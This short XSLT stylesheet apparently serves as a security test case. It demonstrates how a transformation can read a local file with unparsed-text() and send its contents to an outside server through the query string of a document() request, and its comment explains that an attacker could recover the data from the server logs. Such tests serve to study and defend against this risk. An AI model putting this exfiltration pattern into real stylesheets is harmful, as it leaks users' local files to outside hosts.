<xsl:stylesheet version="2.0"
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 
  xmlns="http://www.w3.org/1999/xhtml" 
  xmlns:html="http://www.w3.org/1999/xhtml" 
  exclude-result-prefixes="html">

<!-- Output method XML -->
<xsl:output method="xml" 
  indent="yes"
  omit-xml-declaration="no" 
  encoding="utf-8"  />

  <xsl:template match="/">
    <rdf:RDF  xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
              xmlns:ex="http://example.org/test#">

<!-- The triple whose subject is the input document -->
      <rdf:Description >
          <rdf:value>The contents of a local file are sent to a server
as the value of the query string. The attacker can then read
the local file from the server logs.
<xsl:value-of select="document(
               concat( 'http://www.w3.org/?',
          encode-for-uri(
      unparsed-text('file:///temp/local.txt') ) ) )" />
           </rdf:value>
      </rdf:Description>
    </rdf:RDF>
  </xsl:template>
</xsl:stylesheet>